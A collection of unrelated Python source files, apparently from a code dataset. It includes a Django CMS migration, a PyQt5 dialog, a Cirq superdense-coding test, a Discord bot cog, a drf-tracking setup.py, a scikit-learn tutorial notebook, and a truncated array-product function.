'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id', 'lft')", 'object_name': 'Page'},
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'blank': 'True'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': "orm['%s']" % user_orm_label}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['%s']" % user_orm_label, 'unique': 'True', 'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': ['auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': "orm['%s']" % user_orm_label}),
'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms']
symmetrical = True
|
py | b414cd64fe162f7625440bc3d31f7121e22ec524 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'motif_ops.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_efed(object):
def setupUi(self, efed):
efed.setObjectName("efed")
efed.setWindowModality(QtCore.Qt.ApplicationModal)
efed.resize(380, 241)
self.frame = QtWidgets.QFrame(efed)
self.frame.setGeometry(QtCore.QRect(0, 0, 381, 241))
self.frame.setStyleSheet("QFrame#frame{\n"
" border-radius:15px;\n"
" background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:1, stop:0.116919 rgba(0, 115, 173, 255), stop:0.944118 rgba(0, 0, 0, 255));\n"
" \n"
"}")
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.title_bar = QtWidgets.QFrame(self.frame)
self.title_bar.setGeometry(QtCore.QRect(-1, -1, 381, 41))
self.title_bar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.title_bar.setFrameShadow(QtWidgets.QFrame.Raised)
self.title_bar.setObjectName("title_bar")
self.mini = QtWidgets.QPushButton(self.title_bar)
self.mini.setGeometry(QtCore.QRect(320, 10, 20, 20))
font = QtGui.QFont()
font.setPointSize(22)
font.setBold(True)
font.setWeight(75)
self.mini.setFont(font)
self.mini.setStyleSheet("QPushButton{\n"
" border:none;\n"
" border-radius:10px;\n"
" background-color: rgb(255, 170, 0);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" background-color: rgb(206, 137, 0);\n"
"}")
self.mini.setText("")
self.mini.setObjectName("mini")
self.label = QtWidgets.QLabel(self.title_bar)
self.label.setGeometry(QtCore.QRect(20, 10, 191, 31))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(20)
font.setBold(True)
font.setItalic(False)
font.setUnderline(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setStyleSheet("color: rgb(255, 255, 255);")
self.label.setObjectName("label")
self.close_btn = QtWidgets.QPushButton(self.title_bar)
self.close_btn.setGeometry(QtCore.QRect(350, 10, 20, 20))
self.close_btn.setMinimumSize(QtCore.QSize(20, 20))
self.close_btn.setMaximumSize(QtCore.QSize(20, 20))
font = QtGui.QFont()
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.close_btn.setFont(font)
self.close_btn.setStyleSheet("QPushButton{\n"
" border:none;\n"
" border-radius:10px;\n"
" background-color: rgb(255, 0, 0);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" background-color: rgb(211, 0, 0);\n"
"}")
self.close_btn.setText("")
self.close_btn.setObjectName("close_btn")
self.label_3 = QtWidgets.QLabel(self.frame)
self.label_3.setGeometry(QtCore.QRect(100, 140, 191, 31))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setStyleSheet("color: rgb(255, 85, 0);")
self.label_3.setText("")
self.label_3.setObjectName("label_3")
self.label_2 = QtWidgets.QLabel(self.frame)
self.label_2.setGeometry(QtCore.QRect(30, 70, 311, 41))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setStyleSheet("color: rgb(255, 255, 255);")
self.label_2.setObjectName("label_2")
self.motif = QtWidgets.QTextEdit(self.frame)
self.motif.setGeometry(QtCore.QRect(33, 106, 331, 121))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(14)
self.motif.setFont(font)
self.motif.setStyleSheet("background-color:transparent;\n"
"color: rgb(255, 255, 255);\n"
"border-bottom:1px solid rgb(255, 255, 255);\n"
"border-right:1px solid rgb(255, 255, 255);\n"
"border-radius:15px;\n"
"")
self.motif.setReadOnly(True)
self.motif.setObjectName("motif")
self.retranslateUi(efed)
QtCore.QMetaObject.connectSlotsByName(efed)
def retranslateUi(self, efed):
_translate = QtCore.QCoreApplication.translate
efed.setWindowTitle(_translate("efed", "efed"))
self.label.setText(_translate("efed", "REMARQUES"))
self.label_2.setText(_translate("efed", "Remarque d\'opération :"))
|
py | b414ce700713c92e47901993304bf2007f0ad994 | # ========================================================================
# Copyright (C) 2019 The MITRE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
import vs_test_path_fixup
import unittest
import cirq
class SuperdenseCodingTests(unittest.TestCase):
"""
This class contains a simple implementation of the superdense coding protocol.
Note that unlike the other fundamental algorithms, this class uses a "circuit"
instance variable to represent the quantum circuit that holds the superdense coding
protocol. This is another example of Cirq's flexibility with respect to circuits
and registers.
"""
def setUp(self):
"""
Iniitalizes the unit test class.
"""
self.circuit = cirq.Circuit()
# ==============================
# == Algorithm Implementation ==
# ==============================
def encode_message(self, buffer, pair_a):
"""
Encodes two bits of information into an entangled qubit.
Parameters:
buffer (list[bool]): The two bits to encode into the qubit.
pair_a (Qid): The qubit to encode the information into. This
qubit must have already been entangled with another one.
"""
# Superposition takes advantage of the fact that if you start with |00> + |11>,
# you can modify it with X and Z on one qubit in a way that will affect both
# qubits.
# Nothing, X, Z, and XZ will all produce discrete, measureable states when
# both qubits are disentangled.
# We're going to use this lookup table to encode the given bits into the qubit
# pair:
# 00 = |00> + |11> (nothing happens)
# 01 = |01> + |10> (X, the parity is flipped)
# 10 = |00> - |11> (Z, the phase is flipped)
# 11 = |01> - |10> (XZ, parity and phase are flipped)
if(buffer[1]):
self.circuit.append(cirq.X(pair_a)) # X if the low bit is 1
if(buffer[0]):
self.circuit.append(cirq.Z(pair_a)) # Z if the high bit is 1
def decode_message(self, pair_a, pair_b):
"""
Decodes two bits of information from an entangled pair of qubits.
Parameters:
pair_a (Qid): The "remote" qubit that was modified by the encoding
process.
pair_b (Qid): The "local" qubit that we received, which wasn't
directly modified.
Returns:
a_measurement_key (str): The key of the measurement of the "remote" qubit.
b_measurement_key (str): The key of the measurement of the "local" qubit.
"""
a_measurement_key = "a_measurement"
b_measurement_key = "b_measurement"
self.circuit.append([
cirq.CNOT(pair_a, pair_b),
cirq.H(pair_a)
])
# Here's the decoding table based on the states after running
# them through CNOT(A, B) and H(A):
# |00> + |11> => |00> + |10> => |00>, so 00 means nothing happened
# |01> + |10> => |01> + |11> => |01>, so 01 means X happened
# |00> - |11> => |00> - |10> => |10>, so 10 means Z happened
# |01> - |10> => |01> - |11> => |11>, so 11 means XZ happened
# Notice how all 4 options align with the bit string used by the encoding
# table, so measuring these qubits gives us the original bits where
# pair_b corresponds to whether or not X was used, and pair_a corresponds
# to Z.
self.circuit.append([
cirq.measure(pair_a, key=a_measurement_key),
cirq.measure(pair_b, key=b_measurement_key),
])
return (a_measurement_key, b_measurement_key)
# ====================
# == Test Case Code ==
# ====================
def run_test(self, description, iterations, buffer):
"""
Runs the superdense coding algorithm on the given classical buffer.
Parameters:
description (str): A description of the test, for logging.
iterations (int): The number of times to run the circuit.
buffer (list[Bool]): The buffer containing the two bits to send.
"""
# Construct the registers and circuit.
print(f"Running test: {description}")
pair_a = cirq.NamedQubit(name="pair_a")
pair_b = cirq.NamedQubit(name="pair_b")
# Entangle the qubits together
self.circuit.append([
cirq.H(pair_a),
cirq.CNOT(pair_a, pair_b)
])
# Encode the buffer into the qubits, then decode them into classical measurements
self.encode_message(buffer, pair_a)
(a_measurement_key, b_measurement_key) = self.decode_message(pair_a, pair_b)
# Run the circuit N times.
simulator = cirq.Simulator()
result = simulator.run(self.circuit, repetitions=iterations)
# Check the first qubit to make sure it was always the expected value
desired_a_state = int(buffer[0])
a_result = result.histogram(key=a_measurement_key)
correct_a_counts = a_result[desired_a_state]
if correct_a_counts != iterations:
self.fail(f"Test {description} failed. The first bit should have been {desired_a_state} all " +
f"{iterations} times but it was only in this state {correct_a_counts} times.")
else:
print(f"The first qubit was {desired_a_state} all {iterations} times.")
# Check the second qubit to make sure it was always the expected value
desired_b_state = int(buffer[1])
b_result = result.histogram(key=b_measurement_key)
correct_b_counts = b_result[desired_b_state]
if correct_b_counts != iterations:
self.fail(f"Test {description} failed. The second bit should have been {desired_b_state} all " +
f"{iterations} times but it was only in this state {correct_b_counts} times.")
else:
print(f"The second qubit was {desired_b_state} all {iterations} times.")
print("Passed!")
print()
def test_00(self):
"""
Runs the superdense coding test on [00].
"""
self.run_test("Superdense [00]", 100, [False, False])
def test_01(self):
"""
Runs the superdense coding test on [01].
"""
self.run_test("Superdense [01]", 100, [False, True])
def test_10(self):
"""
Runs the superdense coding test on [10].
"""
self.run_test("Superdense [10]", 100, [True, False])
def test_11(self):
"""
Runs the superdense coding test on [11].
"""
self.run_test("Superdense [11]", 100, [True, True])
if __name__ == '__main__':
unittest.main()
|
py | b414cf92f696f6586e443d661d1510c33bc88e2e | import discord
from discord.ext import commands
class Util(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def ping(self, ctx):
await ctx.send(f'📶 {round(self.client.latency*1000)}ms')
@commands.command()
async def help(self, ctx):
embed = discord.Embed(title = "Commands List", colour = discord.Color.lighter_gray(), timestamp=ctx.message.created_at)
embed.set_footer(text=f'Requested by {ctx.author}', icon_url=ctx.author.avatar_url)
embed.add_field(name="Moderation 🔒", value=".clear [amount]\tor .c\n.mute @mention\n.unmute @mention\n.kick @mention\n.ban @mention\n.unban [name#tag]\n - ")
#embed.add_field(name="_", value="_", inline=False)
embed.add_field(name="Utility ⚙️", value='.ping\n.poll [text]\n.info @mention\n.id @mention\n.membercount\n - ')
embed.add_field(name="Fun 🎉",value='.bong\tpurge bongs\n.say [text]\n.quote [text]\n.ask [text]\n.who\n.coin\n.enter\n.exit (to exit the chats in style)\n.wtc (watch the 9/11 incident)\n.hoe\n.nyan\n.ok\n.cry\n.pankaj\n.bruh\n',inline=False)
embed.set_footer(text="This bot is still under development 😤")
await ctx.send(embed=embed)
#@commands.command()
#async def usercount(self, ctx):
# await ctx.send(len(ctx.guild.members))
@commands.command()
async def membercount(self,ctx):
await ctx.send(ctx.guild.member_count)
def setup(client):
client.add_cog(Util(client)) |
py | b414d076c05e535e8e25015ca5131cd131145188 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = '[email protected]'
license = 'BSD'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[
'Django>=1.7',
'djangorestframework>=3'
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Framework :: Django :: 1.10',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet :: WWW/HTTP',
]
)
|
py | b414d0caaea97f58fb059385951bdaf0eba18731 | # Game Constants
screen_width = 1280
screen_height = 720
font_size = screen_width / 40
screen_font = "assets/fonts/aerial.ttf"
max_player_life = 5
max_enemy_spawn_interval = 5.0 # in seconds
aim_rotation_speed = 90.0
turret_rotation_speed = 25.0
aim_angle_range = {'min': -60, 'max': 60}
turret_cool_down_duration = 1.5
enemy_mass = 10.0
bullet_velocity = 5.0
max_debris = 256 |
py | b414d10e061b26808267ccd53cb3bbe93d5758ad | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.6.0
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# # First model with scikit-learn
#
# In this notebook, we present how to build predictive models on tabular
# datasets, with only numerical features.
#
# In particular we will highlight:
#
# * the scikit-learn API: `.fit(X, y)`/`.predict(X)`/`.score(X, y)`;
# * how to evaluate the generalization performance of a model with a train-test
# split.
#
# ## Loading the dataset with Pandas
#
# We will use the same dataset "adult_census" described in the previous
# notebook. For more details about the dataset see
# <http://www.openml.org/d/1590>.
#
# Numerical data is the most natural type of data used in machine learning and
# can (almost) directly be fed into predictive models. We will load a
# subset of the original data with only the numerical columns.
# %%
import pandas as pd
adult_census = pd.read_csv("../datasets/adult-census-numeric.csv")
# %% [markdown]
# Let's have a look at the first records of this dataframe:
# %%
adult_census.head()
# %% [markdown]
# We see that this CSV file contains all information: the target that we would
# like to predict (i.e. `"class"`) and the data that we want to use to train
# our predictive model (i.e. the remaining columns). The first step is to
# separate columns to get on one side the target and on the other side the
# data.
#
# ## Separate the data and the target
# %%
target_name = "class"
target = adult_census[target_name]
target
# %%
data = adult_census.drop(columns=[target_name, ])
data.head()
# %% [markdown]
# We can now linger on the variables, also denominated features, that we will
# use to build our predictive model. In addition, we can also check how many
# samples are available in our dataset.
# %%
data.columns
# %%
print(f"The dataset contains {data.shape[0]} samples and "
f"{data.shape[1]} features")
# %% [markdown]
# ## Fit a model and make predictions
#
# We will build a classification model using the "K-nearest neighbors"
# strategy. To predict the target of a new sample, a k-nearest neighbors takes
# into account its `k` closest samples in the training set and predicts the
# majority target of these samples.
#
# ```{caution}
# We use a K-nearest neighbors here. However, be aware that it is seldom useful
# in practice. We use it because it is an intuitive algorithm. In the next
# notebook, we will introduce better models.
# ```
#
# The `fit` method is called to train the model from the input (features) and
# target data.
# %%
# to display nice model diagram
from sklearn import set_config
set_config(display='diagram')
# %%
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier()
model.fit(data, target)
# %% [markdown]
# Learning can be represented as follows:
#
# 
#
# The method `fit` is composed of two elements: (i) a **learning algorithm**
# and (ii) some **model states**. The learning algorithm takes the training
# data and training target as input and sets the model states. These model
# states will be used later to either predict (for classifiers and regressors)
# or transform data (for transformers).
#
# Both the learning algorithm and the type of model states are specific to each
# type of model.
# %% [markdown]
# ```{note}
# Here and later, we use the name `data` and `target` to be explicit. In
# scikit-learn documentation, `data` is commonly named `X` and `target` is
# commonly called `y`.
# ```
# %% [markdown]
# Let's use our model to make some predictions using the same dataset.
# %%
target_predicted = model.predict(data)
# %% [markdown]
# We can illustrate the prediction mechanism as follows:
#
# 
#
# To predict, a model uses a **prediction function** that will use the input
# data together with the model states. As for the learning algorithm and the
# model states, the prediction function is specific for each type of model.
# %% [markdown]
# Let's now have a look at the computed predictions. For the sake of
# simplicity, we will look at the five first predicted targets.
# %%
target_predicted[:5]
# %% [markdown]
# Indeed, we can compare these predictions to the actual data...
# %%
target[:5]
# %% [markdown]
# ...and we could even check if the predictions agree with the real targets:
# %%
target[:5] == target_predicted[:5]
# %%
print(f"Number of correct prediction: "
f"{(target[:5] == target_predicted[:5]).sum()} / 5")
# %% [markdown]
# Here, we see that our model makes a mistake when predicting for the first
# sample.
#
# To get a better assessment, we can compute the average success rate.
# %%
(target == target_predicted).mean()
# %% [markdown]
# But, can this evaluation be trusted, or is it too good to be true?
#
# ## Train-test data split
#
# When building a machine learning model, it is important to evaluate the
# trained model on data that was not used to fit it, as **generalization** is
# more than memorization (meaning we want a rule that generalizes to new data,
# without comparing to data we memorized).
# It is harder to conclude on never-seen instances than on already seen ones.
#
# Correct evaluation is easily done by leaving out a subset of the data when
# training the model and using it afterwards for model evaluation.
# The data used to fit a model is called training data while the data used to
# assess a model is called testing data.
#
# We can load more data, which was actually left-out from the original data
# set.
# %%
adult_census_test = pd.read_csv('../datasets/adult-census-numeric-test.csv')
# %% [markdown]
# From this new data, we separate our input features and the target to predict,
# as in the beginning of this notebook.
# %%
target_test = adult_census_test[target_name]
data_test = adult_census_test.drop(columns=[target_name, ])
# %% [markdown]
# We can check the number of features and samples available in this new set.
# %%
print(f"The testing dataset contains {data_test.shape[0]} samples and "
f"{data_test.shape[1]} features")
# %% [markdown]
#
# Instead of computing the prediction and manually computing the average
# success rate, we can use the method `score`. When dealing with classifiers
# this method returns their performance metric.
# %%
accuracy = model.score(data_test, target_test)
model_name = model.__class__.__name__
print(f"The test accuracy using a {model_name} is "
f"{accuracy:.3f}")
# %% [markdown]
# Let's check the underlying mechanism when the `score` method is called:
#
# 
#
# To compute the score, the predictor first computes the predictions (using
# the `predict` method) and then uses a scoring function to compare the
# true target `y` and the predictions. Finally, the score is returned.
# %% [markdown]
# If we compare with the accuracy obtained by wrongly evaluating the model
# on the training set, we find that this evaluation was indeed optimistic
# compared to the score obtained on an held-out test set.
#
# It shows the importance to always testing the generalization performance of
# predictive models on a different set than the one used to train these models.
# We will discuss later in more details how predictive models should be
# evaluated.
# %% [markdown]
# ```{note}
# In this MOOC, we will refer to **generalization performance** of a model when
# referring to the test score or test error obtained by comparing the
# prediction of a model and the true targets. Equivalent terms for
# **generalization performance** are predictive performance and statistical
# performance. We will refer to **computational performance** of a predictive
# model when accessing the computational costs of training a predictive model
# or using it to make predictions.
# ```
# %% [markdown]
# In this notebook we:
#
# * fitted a **k-nearest neighbors** model on a training dataset;
# * evaluated its generalization performance on the testing data;
# * introduced the scikit-learn API `.fit(X, y)` (to train a model),
# `.predict(X)` (to make predictions) and `.score(X, y)`
# (to evaluate a model).
|
py | b414d12d23e39188311cfba85ae29ae69ed873b6 | def calc_products_of_all_others(arr: list[int]) -> list[int]:
"""Calculate a new array with each entry at index i is a product of all numbers in the original array except the one at i."""
if arr is None: raise TypeError("'None' is not allowed for input")
backward_products = [1]*len(arr)
for i in range(len(arr)-1 , 0, -1):
backward_products[i-1] = backward_products[i] * arr[i]
products_of_all_others = [1]*len(arr)
forward_product = 1
